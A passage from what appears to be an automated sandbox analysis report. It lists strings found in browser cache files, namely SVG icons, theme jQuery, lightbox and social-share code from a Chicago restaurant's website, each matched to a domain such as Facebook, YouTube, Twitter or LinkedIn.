c-4.1-1.8-11.3-4.3-27.1-5c-15.4-0.7-20.4-0.7-58.8-0.7s-43.4,0-58.8,0.7c-11.5,0.6-20.4,2.2-27,5c-6.7,2.5-11.8,5.7-17,10.9 c-5.5,5.9-8.4,10.5-10.9,16.9c-1.8,4.1-4.3,11.3-5,27.1c-0.7,15.4-0.7,20.4-0.7,58.8s0,43.4,0.7,58.8c0.4,14.3,2.9,22,5,27.1 c2.5,6.7,5.7,11.8,10.9,17c5.9,5.5,10.5,8.4,16.9,10.9c4.1,1.8,11.3,4.3,27.1,5c15.4,0.7,20.4,0.7,58.8,0.7s43.4,0,58.8-0.7 c11.5-0.6,20.4-2.2,27-5c6.7-2.5,11.8-5.7,17-10.9c5.5-5.9,8.4-10.5,10.9-16.9c1.8-4.1,4.3-11.3,5-27.1l0.2-3.4 c0.6-13.1,0.9-19.7,0.5-55.5C376,218,376,213.1,375.3,197.7z M351.4,178.7c0,9.4-7.7,17.1-17.1,17.1c-9.4,0-17.1-7.7-17.1-17.1 c0-9.4,7.7-17.1,17.1-17.1C343.7,161.6,351.4,169.3,351.4,178.7z M256.5,330.6c-40.9,0-74.1-33.2-74.1-74.1 c0-40.9,33.2-74.1,74.1-74.1c40.9,0,74.1,33.2,74.1,74.1C330.6,297.4,297.4,330.6,256.5,330.6z"/><ellipse transform="matrix(0.9732 -0.2298 0.2298 0.9732 -52.0702 65.7936)" cx="256.5" cy="256.5" rx="48.9" ry="48.9"/><path d="M437.9,75.1C389.4,26.7,325,0,256.5,0C188,0,123.6,26.7,75.1,75.1S0,188,0,256.5C0,325,26.7,389.4,75.1,437.9 C123.6,486.3,188,513,256.5,513c68.5,0,132.9-26.7,181.4-75.1C486.3,389.4,513,325,513,256.5C513,188,486.3,123.6,437.9,75.1z M400.8,316.4L400.8,316.4c-0.6,14.1-2.7,24.7-6.8,35.3c-4.2,10.5-9.2,18.2-16.7,25.6c-8,8-16,13.2-25.6,16.7 c-10.4,4-21.3,6.1-35.3,6.8c-15.4,0.7-20.5,0.7-59.9,0.7c-39.3,0-44.4,0-59.9-0.7c-14.1-0.6-24.7-2.6-35.3-6.8 c-10.5-4.2-18.2-9.2-25.6-16.7c-8.1-8.1-13.2-16-16.7-25.6c-4-10.4-6.1-21.3-6.8-35.3c-0.7-15.4-0.7-20.5-0.7-59.9 c0-39.3,0-44.4,0.7-59.9c0.6-14.1,2.6-24.7,6.8-35.3c3.9-9.7,9-17.6,16.7-25.6c8.1-8.1,16-13.2,25.6-16.7c10.4-4,21.3-6.1,35.3-6.8 c15.4-0.7,20.5-0.7,59.9-0.7c39.3,0,44.4,0,59.9,0.7c14.1,0.6,24.7,2.6,35.3,6.8c10.5,4.2,18.1,9.2,25.6,16.7 c8,8.1,13.2,16,16.7,25.6c4,10.4,6.1,21.3,6.8,35.3c0.7,15.4,0.7,20.5,0.7,59.9C401.5,295.8,401.5,300.9,400.8,316.4z"/></svg></i></a></li><li><a class="yelp-h
Source: chromecache_189.1.dr	String found in binary or memory: <div class="mk-header-social toolbar-section"><ul><li><a class="facebook-hover " target="_blank" rel="noreferrer noopener" href="https://www.facebook.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-facebook" data-cacheid="icon-68f18a5806adf" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M256-6.4c-141.385 0-256 114.615-256 256s114.615 256 256 256 256-114.615 256-256-114.615-256-256-256zm64.057 159.299h-49.041c-7.42 0-14.918 7.452-14.918 12.99v19.487h63.723c-2.081 28.41-6.407 64.679-6.407 64.679h-57.566v159.545h-63.929v-159.545h-32.756v-64.474h32.756v-33.53c0-8.098-1.706-62.336 70.46-62.336h57.678v63.183z"/></svg></i></a></li><li><a class="instagram-hover " target="_blank" rel="noreferrer noopener" href="https://www.instagram.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-instagram" data-cacheid="icon-68f18a5806ccb" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M375.3,197.7L375.3,197.7c-0.6-11.5-2.2-20.4-5-27.1c-2.5-6.7-5.7-11.8-10.9-17c-5.9-5.5-10.5-8.4-16.9-10.9 c-4.1-1.8-11.3-4.3-27.1-5c-15.4-0.7-20.4-0.7-58.8-0.7s-43.4,0-58.8,0.7c-11.5,0.6-20.4,2.2-27,5c-6.7,2.5-11.8,5.7-17,10.9 c-5.5,5.9-8.4,10.5-10.9,16.9c-1.8,4.1-4.3,11.3-5,27.1c-0.7,15.4-0.7,20.4-0.7,58.8s0,43.4,0.7,58.8c0.4,14.3,2.9,22,5,27.1 c2.5,6.7,5.7,11.8,10.9,17c5.9,5.5,10.5,8.4,16.9,10.9c4.1,1.8,11.3,4.3,27.1,5c15.4,0.7,20.4,0.7,58.8,0.7s43.4,0,58.8-0.7 c11.5-0.6,20.4-2.2,27-5c6.7-2.5,11.8-5.7,17-10.9c5.5-5.9,8.4-10.5,10.9-16.9c1.8-4.1,4.3-11.3,5-27.1l0.2-3.4 c0.6-13.1,0.9-19.7,0.5-55.5C376,218,376,213.1,375.3,197.7z M351.4,178.7c0,9.4-7.7,17.1-17.1,17.1c-9.4,0-17.1-7.7-17.1-17.1 c0-9.4,7.7-17.1,17.1-17.1C343.7,161.6,351.4,169.3,351.4,178.7z M256.5,330.6c-40.9,0-74.1-33.2-74.1-74.1 c0-40.9,33.2-74.1,74.1-74.1c40.9,0,74.1,33.2,74.1,74.1C330.6,297.4,297.4,330.6,256.5,330.6z"/><ellipse transform="matrix(0.9732 -0.2298 0.2298 0.9732 -52.0702 65.7936)" cx="256.5" cy="256.5" rx="48.9" ry="48.9"/><path d="M437.9,75.1C389.4,26.7,325,0,256.5,0C188,0,123.6,26.7,75.1,75.1S0,188,0,256.5C0,325,26.7,389.4,75.1,437.9 C123.6,486.3,188,513,256.5,513c68.5,0,132.9-26.7,181.4-75.1C486.3,389.4,513,325,513,256.5C513,188,486.3,123.6,437.9,75.1z M400.8,316.4L400.8,316.4c-0.6,14.1-2.7,24.7-6.8,35.3c-4.2,10.5-9.2,18.2-16.7,25.6c-8,8-16,13.2-25.6,16.7 c-10.4,4-21.3,6.1-35.3,6.8c-15.4,0.7-20.5,0.7-59.9,0.7c-39.3,0-44.4,0-59.9-0.7c-14.1-0.6-24.7-2.6-35.3-6.8 c-10.5-4.2-18.2-9.2-25.6-16.7c-8.1-8.1-13.2-16-16.7-25.6c-4-10.4-6.1-21.3-6.8-35.3c-0.7-15.4-0.7-20.5-0.7-59.9 c0-39.3,0-44.4,0.7-59.9c0.6-14.1,2.6-24.7,6.8-35.3c3.9-9.7,9-17.6,16.7-25.6c8.1-8.1,16-13.2,25.6-16.7c10.4-4,21.3-6.1,35.3-6.8 c15.4-0.7,20.5-0.7,59.9-0.7c39.3,0,44.4,0,59.9,0.7c14.1,0.6,24.7,2.6,35.3,6.8c10.5,4.2,18.1,9.2,25.6,16.7 c8,8.1,13.2,16,16.7,25.6c4,10.4,6.1,21.3,6.8,35.3c0.7,15.4,0.7,20.5,0.7,59.9C401.5,295.8,401.5,300.9,400.8,316.4z"/></svg></i></a></li><li><a class="yelp-h
Source: chromecache_189.1.dr	String found in binary or memory: <li><a rel="noreferrer noopener" target="_blank" class="facebook-hover c_" href="http://www.facebook.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-square-facebook" data-cacheid="icon-68f18a5837ada" style=" height:64px; width: 64px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M444-6.4h-376c-37.555 0-68 30.445-68 68v376c0 37.555 30.445 68 68 68h376c37.555 0 68-30.445 68-68v-376c0-37.555-30.445-68-68-68zm-123.943 159.299h-49.041c-7.42 0-14.918 7.452-14.918 12.99v19.487h63.723c-2.081 28.41-6.407 64.679-6.407 64.679h-57.565v159.545h-63.929v-159.545h-32.756v-64.474h32.756v-33.53c0-8.098-1.706-62.336 70.46-62.336h57.678v63.183z"/></svg></a></li><li><a rel="noreferrer noopener" target="_blank" class="twitter-hover c_" href="http://www.twitter.com/thefatshallot"><?xml version="1.0" encoding="utf-8"?> equals www.facebook.com (Facebook)
Source: chromecache_189.1.dr	String found in binary or memory: <li><a rel="noreferrer noopener" target="_blank" class="facebook-hover c_" href="http://www.facebook.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-square-facebook" data-cacheid="icon-68f18a5837ada" style=" height:64px; width: 64px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M444-6.4h-376c-37.555 0-68 30.445-68 68v376c0 37.555 30.445 68 68 68h376c37.555 0 68-30.445 68-68v-376c0-37.555-30.445-68-68-68zm-123.943 159.299h-49.041c-7.42 0-14.918 7.452-14.918 12.99v19.487h63.723c-2.081 28.41-6.407 64.679-6.407 64.679h-57.565v159.545h-63.929v-159.545h-32.756v-64.474h32.756v-33.53c0-8.098-1.706-62.336 70.46-62.336h57.678v63.183z"/></svg></a></li><li><a rel="noreferrer noopener" target="_blank" class="twitter-hover c_" href="http://www.twitter.com/thefatshallot"><?xml version="1.0" encoding="utf-8"?> equals www.twitter.com (Twitter)
Source: chromecache_189.1.dr	String found in binary or memory: <li><a rel="noreferrer noopener" target="_blank" class="facebook-hover c_" href="https://www.facebook.com/thefatshallot"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-simple-facebook" data-cacheid="icon-68f18a5849618" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M192.191 92.743v60.485h-63.638v96.181h63.637v256.135h97.069v-256.135h84.168s6.674-51.322 9.885-96.508h-93.666v-42.921c0-8.807 11.565-20.661 23.01-20.661h71.791v-95.719h-83.57c-111.317 0-108.686 86.262-108.686 99.142z"/></svg></a></li><li><a rel="noreferrer noopener" target="_blank" class="instagram-hover c_" href="https://www.instagram.com/thefatshallot/"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-simple-instagram" data-cacheid="icon-68f18a58496fd" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 81.2 81.2"><path d="M81,23.9c-0.2-4.3-0.9-7.3-1.9-9.9c-1-2.7-2.4-4.9-4.7-7.2c-2.3-2.3-4.5-3.6-7.2-4.7c-2.6-1-5.5-1.7-9.9-1.9 C53,0,51.6,0,40.6,0c-11,0-12.4,0-16.7,0.2c-4.3,0.2-7.3,0.9-9.9,1.9c-2.7,1-4.9,2.4-7.2,4.7C4.6,9.1,3.2,11.3,2.1,14 c-1,2.6-1.7,5.5-1.9,9.9C0,28.2,0,29.6,0,40.6c0,11,0,12.4,0.2,16.7c0.2,4.3,0.9,7.3,1.9,9.9c1,2.7,2.4,4.9,4.7,7.2 c2.3,2.3,4.5,3.6,7.2,4.7c2.6,1,5.5,1.7,9.9,1.9c4.3,0.2,5.7,0.2,16.7,0.2c11,0,12.4,0,16.7-0.2c4.3-0.2,7.3-0.9,9.9-1.9 c2.7-1,4.9-2.4,7.2-4.7c2.3-2.3,3.6-4.5,4.7-7.2c1-2.6,1.7-5.5,1.9-9.9c0.2-4.3,0.2-5.7,0.2-16.7C81.2,29.6,81.2,28.2,81,23.9z M73.6,57c-0.2,4-0.8,6.1-1.4,7.5c-0.7,1.9-1.6,3.2-3,4.7c-1.4,1.4-2.8,2.3-4.7,3c-1.4,0.6-3.6,1.2-7.5,1.4 c-4.3,0.2-5.6,0.2-16.4,0.2c-10.8,0-12.1,0-16.4-0.2c-4-0.2-6.1-0.8-7.5-1.4c-1.9-0.7-3.2-1.6-4.7-3c-1.4-1.4-2.3-2.8-3-4.7 C8.4,63.1,7.7,61,7.6,57c-0.2-4.3-0.2-5.6-0.2-16.4c0-10.8,0-12.1,0.2-16.4c0.2-4,0.8-6.1,1.4-7.5c0.7-1.9,1.6-3.2,3-4.7 c1.4-1.4,2.8-2.3,4.7-3c1.4-0.6,3.6-1.2,7.5-1.4c4.3-0.2,5.6-0.2,16.4-0.2c10.8,0,12.1,0,16.4,0.2c4,0.2,6.1,0.8,7.5,1.4 c1.9,0.7,3.2,1.6,4.7,3c1.4,1.4,2.3,2.8,3,4.7c0.6,1.4,1.2,3.6,1.4,7.5c0.2,4.3,0.2,5.6,0.2,16.4C73.9,51.4,73.8,52.7,73.6,57z"/><path d="M40.6,19.8c-11.5,0-20.8,9.3-20.8,20.8c0,11.5,9.3,20.8,20.8,20.8c11.5,0,20.8-9.3,20.8-20.8 C61.4,29.1,52.1,19.8,40.6,19.8z M40.6,54.1c-7.5,0-13.5-6.1-13.5-13.5c0-7.5,6.1-13.5,13.5-13.5c7.5,0,13.5,6.1,13.5,13.5 C54.1,48.1,48.1,54.1,40.6,54.1z"/><circle cx="62.3" cy="18.9" r="4.9"/></svg></a></li><li><a rel="noreferrer noopener" target="_blank" class="yelp-hover c_" href="https://www.yelp.com/biz/the-fat-shallot-chicago-9"><svg class="mk-svg-icon" data-name="mk-jupiter-icon-simple-yelp" data-cacheid="icon-68f18a58497ba" style=" height:16px; width: 16px; " xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M211.871 211.458c7.339 11.87 20.685 20.165 29.751 18.474 9.025-1.724 16.314-14.544 16.218-28.493l-1.168-177.687c-.146-13.94-10.906-25.376-31.502-29.322-20.588-3.963-70.611 1.851-96.632 22.17-32.484 25.375-17.816 30.618-10.533 42.512l93.866 152.344zm33.628 132.669c-9.48-.87-24.521 7.167-33.497 17.815l-65.924 78.
Source: chromecache_168.1.dr	String found in binary or memory: $.extend(item,{type:type,src:url,origSrc:item.src,contentSource:provider,contentType:type==="image"?"image":provider=="gmap_place"\|\|provider=="gmap_search"?"map":"video"})}else if(url){item.type=item.opts.defaultType}});var VideoAPILoader={youtube:{src:"https://www.youtube.com/iframe_api",class:"YT",loading:!1,loaded:!1},vimeo:{src:"https://player.vimeo.com/api/player.js",class:"Vimeo",loading:!1,loaded:!1},load:function(vendor){var _this=this,script;if(this[vendor].loaded){setTimeout(function(){_this.done(vendor)});return} equals www.youtube.com (Youtube)
Source: chromecache_189.1.dr	String found in binary or memory: <link crossorigin data-rocket-preconnect href="https://www.youtube.com" rel="preconnect"> equals www.youtube.com (Youtube)
Source: chromecache_168.1.dr	String found in binary or memory: break;case "focusout":$(buttonStr).removeClass(focusStr);break}})})()})(window,document,jQuery);(function($){"use strict";var defaults={youtube:{matcher:/(youtube\.com\|youtu\.be\|youtube\-nocookie\.com)\/(watch\?(.&)?v=\|v\/\|u\/\|embed\/?)?(videoseries\?list=(.)\|[\w-]{11}\|\?listType=(.)&list=(.))(.)/i,params:{autoplay:1,autohide:1,fs:1,rel:0,hd:1,wmode:"transparent",enablejsapi:1,html5:1},paramPlace:8,type:"iframe",url:"https://www.youtube-nocookie.com/embed/$4",thumb:"https://img.youtube.com/vi/$4/hqdefault.jpg"},vimeo:{matcher:/^.+vimeo.com\/(.\/)?([\d]+)(.)?/,params:{autoplay:1,hd:1,show_title:1,show_byline:1,show_portrait:0,fullscreen:1},paramPlace:3,type:"iframe",url:"//player.vimeo.com/video/$2"},instagram:{matcher:/(instagr\.am\|instagram\.com)\/p\/([a-zA-Z0-9_\-]+)\/?/i,type:"image",url:"//$1/p/$2/media/?size=l"},gmap_place:{matcher:/(maps\.)?google\.([a-z]{2,3}(\.[a-z]{2})?)\/(((maps\/(place\/(.)\/)?\@(.),(\d+.?\d+?)z))\|(\?ll=))(.)?/i,type:"iframe",url:function(rez){return("//maps.google."+rez[2]+"/?ll="+(rez[9]?rez[9]+"&z="+Math.floor(rez[10])+(rez[12]?rez[12].replace(/^\//,"&"):""):rez[12]+"").replace(/\?/,"&")+"&output="+(rez[12]&&rez[12].indexOf("layer=c")>0?"svembed":"embed"))}},gmap_search:{matcher:/(maps\.)?google\.([a-z]{2,3}(\.[a-z]{2})?)\/(maps\/search\/)(.*)/i,type:"iframe",url:function(rez){return"//maps.google."+rez[2]+"/maps?q="+rez[5].replace("query=","q=").replace("api=1","")+"&output=embed"}}};var format=function(url,rez,params){if(!url){return} equals www.youtube.com (Youtube)
Source: chromecache_207.1.dr	String found in binary or memory: function isInsideYoutubeVideo(event){var elem=event.target;var isControl=!1;if(document.URL.indexOf('www.youtube.com/watch')!=-1){do{isControl=(elem.classList&&elem.classList.contains('html5-video-controls'));if(isControl)break}while(elem=elem.parentNode);} equals www.youtube.com (Youtube)
Source: chromecache_168.1.dr	String found in binary or memory: function mk_social_share_global(){"use strict";var eventtype='click';$('.twitter-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title');window.open('http://twitter.com/intent/tweet?text='+$title+' '+$url,"twitterWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.pinterest-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title'),$image=$this.attr('data-image');window.open('http://pinterest.com/pin/create/button/?url='+$url+'&media='+$image+'&description='+$title,"twitterWindow","height=320,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.facebook-share').on(eventtype,function(){var $url=$(this).attr('data-url');window.open('https://www.facebook.com/sharer/sharer.php?u='+$url,"facebookWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.googleplus-share').on(eventtype,function(){var $url=$(this).attr('data-url');window.open('https://plus.google.com/share?url='+$url,"googlePlusWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.linkedin-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title'),$desc=$this.attr('data-desc');window.open('http://www.linkedin.com/shareArticle?mini=true&url='+$url+'&title='+$title+'&summary='+$desc,"linkedInWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1})} equals www.facebook.com (Facebook)
Source: chromecache_168.1.dr	String found in binary or memory: function mk_social_share_global(){"use strict";var eventtype='click';$('.twitter-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title');window.open('http://twitter.com/intent/tweet?text='+$title+' '+$url,"twitterWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.pinterest-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title'),$image=$this.attr('data-image');window.open('http://pinterest.com/pin/create/button/?url='+$url+'&media='+$image+'&description='+$title,"twitterWindow","height=320,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.facebook-share').on(eventtype,function(){var $url=$(this).attr('data-url');window.open('https://www.facebook.com/sharer/sharer.php?u='+$url,"facebookWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.googleplus-share').on(eventtype,function(){var $url=$(this).attr('data-url');window.open('https://plus.google.com/share?url='+$url,"googlePlusWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.linkedin-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title'),$desc=$this.attr('data-desc');window.open('http://www.linkedin.com/shareArticle?mini=true&url='+$url+'&title='+$title+'&summary='+$desc,"linkedInWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1})} equals www.linkedin.com (Linkedin)
Source: chromecache_168.1.dr	String found in binary or memory: function mk_social_share_global(){"use strict";var eventtype='click';$('.twitter-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title');window.open('http://twitter.com/intent/tweet?text='+$title+' '+$url,"twitterWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.pinterest-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title'),$image=$this.attr('data-image');window.open('http://pinterest.com/pin/create/button/?url='+$url+'&media='+$image+'&description='+$title,"twitterWindow","height=320,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.facebook-share').on(eventtype,function(){var $url=$(this).attr('data-url');window.open('https://www.facebook.com/sharer/sharer.php?u='+$url,"facebookWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.googleplus-share').on(eventtype,function(){var $url=$(this).attr('data-url');window.open('https://plus.google.com/share?url='+$url,"googlePlusWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1});$('.linkedin-share').on(eventtype,function(){var $this=$(this),$url=$this.attr('data-url'),$title=$this.attr('data-title'),$desc=$this.attr('data-desc');window.open('http://www.linkedin.com/shareArticle?mini=true&url='+$url+'&title='+$title+'&summary='+$desc,"linkedInWindow","height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0");return!1})} equals www.twitter.com (Twitter)
Source: chromecache_168.1.dr	String found in binary or memory: init();$(window).on('vc_reload',init)});(function($){'use strict';var utils=MK.utils;var val=MK.val;var $topLevelSections=$('#theme-page > .vc_row, #theme-page > .mk-main-wrapper-holder, #theme-page > .mk-page-section');$(document).on('click','.mk-skip-to-next',function(){var $this=$(this),btnHeight=$this.hasClass('edge-skip-slider')?150:76,offset=$this.offset().top+btnHeight,nextOffset=utils.nextHigherVal(utils.offsets($topLevelSections),[offset]);utils.scrollTo(nextOffset-val.offsetHeaderHeight(nextOffset))})})(jQuery);(function($){'use strict';MK.component.SocialShare=function(el){var networks={twitter:'http://twitter.com/intent/tweet?text={title}&url={url}',pinterest:'http://pinterest.com/pin/create/button/?url={url}&media={image}&description={title}',facebook:'https://www.facebook.com/sharer/sharer.php?u={url}',googleplus:'https://plus.google.com/share?url={url}',linkedin:'http://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={desc}',digg:'http://digg.com/submit?url={url}&title={title}',reddit:'http://reddit.com/submit?url={url}&title={title}',};this.networks=networks;this.el=el};MK.component.SocialShare.prototype={init:function(){this.cacheElements();this.bindEvents()},cacheElements:function(){this.$this=$(this.el)},bindEvents:function(){var thisObject=this;var tempClass="";$.each(this.networks,function(key,value){thisObject.$tempClass=$('.'+key+'-share');thisObject.$tempClass.click(thisObject.openSharingDialog.bind(self,this,key))})},openSharingDialog:function(url,site,args){var urlWrapper=url;var rx=new RegExp('\{[a-z]*\}','g'),res;var match=rx.exec(url);while(match!=null){var pureAttr=match[0].replace("{","").replace("}","");var attValue=$(args.currentTarget).attr('data-'+pureAttr);if(attValue===undefined\|\|attValue===null){attValue=""} equals www.facebook.com (Facebook)
Source: chromecache_168.1.dr	String found in binary or memory: init();$(window).on('vc_reload',init)});(function($){'use strict';var utils=MK.utils;var val=MK.val;var $topLevelSections=$('#theme-page > .vc_row, #theme-page > .mk-main-wrapper-holder, #theme-page > .mk-page-section');$(document).on('click','.mk-skip-to-next',function(){var $this=$(this),btnHeight=$this.hasClass('edge-skip-slider')?150:76,offset=$this.offset().top+btnHeight,nextOffset=utils.nextHigherVal(utils.offsets($topLevelSections),[offset]);utils.scrollTo(nextOffset-val.offsetHeaderHeight(nextOffset))})})(jQuery);(function($){'use strict';MK.component.SocialShare=function(el){var networks={twitter:'http://twitter.com/intent/tweet?text={title}&url={url}',pinterest:'http://pinterest.com/pin/create/button/?url={url}&media={image}&description={title}',facebook:'https://www.facebook.com/sharer/sharer.php?u={url}',googleplus:'https://plus.google.com/share?url={url}',linkedin:'http://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={desc}',digg:'http://digg.com/submit?url={url}&title={title}',reddit:'http://reddit.com/submit?url={url}&title={title}',};this.networks=networks;this.el=el};MK.component.SocialShare.prototype={init:function(){this.cacheElements();this.bindEvents()},cacheElements:function(){this.$this=$(this.el)},bindEvents:function(){var thisObject=this;var tempClass="";$.each(this.networks,function(key,value){thisObject.$tempClass=$('.'+key+'-share');thisObject.$tempClass.click(thisObject.openSharingDialog.bind(self,this,key))})},openSharingDialog:function(url,site,args){var urlWrapper=url;var rx=new RegExp('\{[a-z]*\}','g'),res;var match=rx.exec(url);while(match!=null){var pureAttr=match[0].replace("{","").replace("}","");var attValue=$(args.currentTarget).attr('data-'+pureAttr);if(attValue===undefined\|\|attValue===null){attValue=""} equals www.linkedin.com (Linkedin)
Source: chromecache_168.1.dr	String found in binary or memory: init();$(window).on('vc_reload',init)});(function($){'use strict';var utils=MK.utils;var val=MK.val;var $topLevelSections=$('#theme-page > .vc_row, #theme-page > .mk-main-wrapper-holder, #theme-page > .mk-page-section');$(document).on('click','.mk-skip-to-next',function(){var $this=$(this),btnHeight=$this.hasClass('edge-skip-slider')?150:76,offset=$this.offset().top+btnHeight,nextOffset=utils.nextHigherVal(utils.offsets($topLevelSections),[offset]);utils.scrollTo(nextOffset-val.offsetHeaderHeight(nextOffset))})})(jQuery);(function($){'use strict';MK.component.SocialShare=function(el){var networks={twitter:'http://twitter.com/intent/tweet?text={title}&url={url}',pinterest:'http://pinterest.com/pin/create/button/?url={url}&media={image}&description={title}',facebook:'https://www.facebook.com/sharer/sharer.php?u={url}',googleplus:'https://plus.google.com/share?url={url}',linkedin:'http://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={desc}',digg:'http://digg.com/submit?url={url}&title={title}',reddit:'http://reddit.com/submit?url={url}&title={title}',};this.networks=networks;this.el=el};MK.component.SocialShare.prototype={init:function(){this.cacheElements();this.bindEvents()},cacheElements:function(){this.$this=$(this.el)},bindEvents:function(){var thisObject=this;var tempClass="";$.each(this.networks,function(key,value){thisObject.$tempClass=$('.'+key+'-share');thisObject.$tempClass.click(thisObject.openSharingDialog.bind(self,this,key))})},openSharingDialog:function(url,site,args){var urlWrapper=url;var rx=new RegExp('\{[a-z]*\}','g'),res;var match=rx.exec(url);while(match!=null){var pureAttr=match[0].replace("{","").replace("}","");var attValue=$(args.currentTarget).attr('data-'+pureAttr);if(attValue===undefined\|\|attValue===null){attValue=""} equals www.twitter.com (Twitter)
Source: chromecache_168.1.dr	String found in binary or memory: that.instance.update()},hide:function(){this.isVisible=!1;this.update()},show:function(){this.isVisible=!0;this.update()},toggle:function(){this.isVisible=!this.isVisible;this.update()}});$(document).on({"onInit.fb":function(e,instance){var Thumbs;if(instance&&!instance.Thumbs){Thumbs=new FancyThumbs(instance);if(Thumbs.isActive&&Thumbs.opts.autoStart===!0){Thumbs.show()}}},"beforeShow.fb":function(e,instance,item,firstRun){var Thumbs=instance&&instance.Thumbs;if(Thumbs&&Thumbs.isVisible){Thumbs.focus(firstRun?0:250)}},"afterKeydown.fb":function(e,instance,current,keypress,keycode){var Thumbs=instance&&instance.Thumbs;if(Thumbs&&Thumbs.isActive&&keycode===71){keypress.preventDefault();Thumbs.toggle()}},"beforeClose.fb":function(e,instance){var Thumbs=instance&&instance.Thumbs;if(Thumbs&&Thumbs.isVisible&&Thumbs.opts.hideOnClose!==!1){Thumbs.$grid.hide()}}})})(document,jQuery);(function(document,$){"use strict";$.extend(!0,$.fancybox.defaults,{btnTpl:{share:'<button data-fancybox-share class="fancybox-button fancybox-button--share" title="{{SHARE}}">'+'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M2.55 19c1.4-8.4 9.1-9.8 11.9-9.8V5l7 7-7 6.3v-3.5c-2.8 0-10.5 2.1-11.9 4.2z"/></svg>'+"</button>"},share:{url:function(instance,item){return((!instance.currentHash&&!(item.type==="inline"\|\|item.type==="html")?item.origSrc\|\|item.src:!1)\|\|window.location)},tpl:'<div class="fancybox-share">'+"<h1>{{SHARE}}</h1>"+"<p>"+'<a class="fancybox-share__button fancybox-share__button--fb" href="https://www.facebook.com/sharer/sharer.php?u={{url}}">'+'<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m287 456v-299c0-21 6-35 35-35h38v-63c-7-1-29-3-55-3-54 0-91 33-91 94v306m143-254h-205v72h196" /></svg>'+"<span>Facebook</span>"+"</a>"+'<a class="fancybox-share__button fancybox-share__button--tw" href="https://twitter.com/intent/tweet?url={{url}}&text={{descr}}">'+'<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m456 133c-14 7-31 11-47 13 17-10 30-27 37-46-15 10-34 16-52 20-61-62-157-7-141 75-68-3-129-35-169-85-22 37-11 86 26 109-13 0-26-4-37-9 0 39 28 72 65 80-12 3-25 4-37 2 10 33 41 57 77 57-42 30-77 38-122 34 170 111 378-32 359-208 16-11 30-25 41-42z" /></svg>'+"<span>Twitter</span>"+"</a>"+'<a class="fancybox-share__button fancybox-share__button--pt" href="https://www.pinterest.com/pin/create/button/?url={{url}}&description={{descr}}&media={{media}}">'+'<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m265 56c-109 0-164 78-164 144 0 39 15 74 47 87 5 2 10 0 12-5l4-19c2-6 1-8-3-13-9-11-15-25-15-45 0-58 43-110 113-110 62 0 96 38 96 88 0 67-30 122-73 122-24 0-42-19-36-44 6-29 20-60 20-81 0-19-10-35-31-35-25 0-44 26-44 60 0 21 7 36 7 36l-30 125c-8 37-1 83 0 87 0 3 4 4 5 2 2-3 32-39 42-75l16-64c8 16 31 29 56 29 74 0 124-67 124-157 0-69-58-132-146-132z" fill="#fff"/></svg>'+"<span>Pinterest</span>"+"</a>"+"</p>"+'<p><input class="fancybox-share__input" type="text" value="{{url_raw}}" o
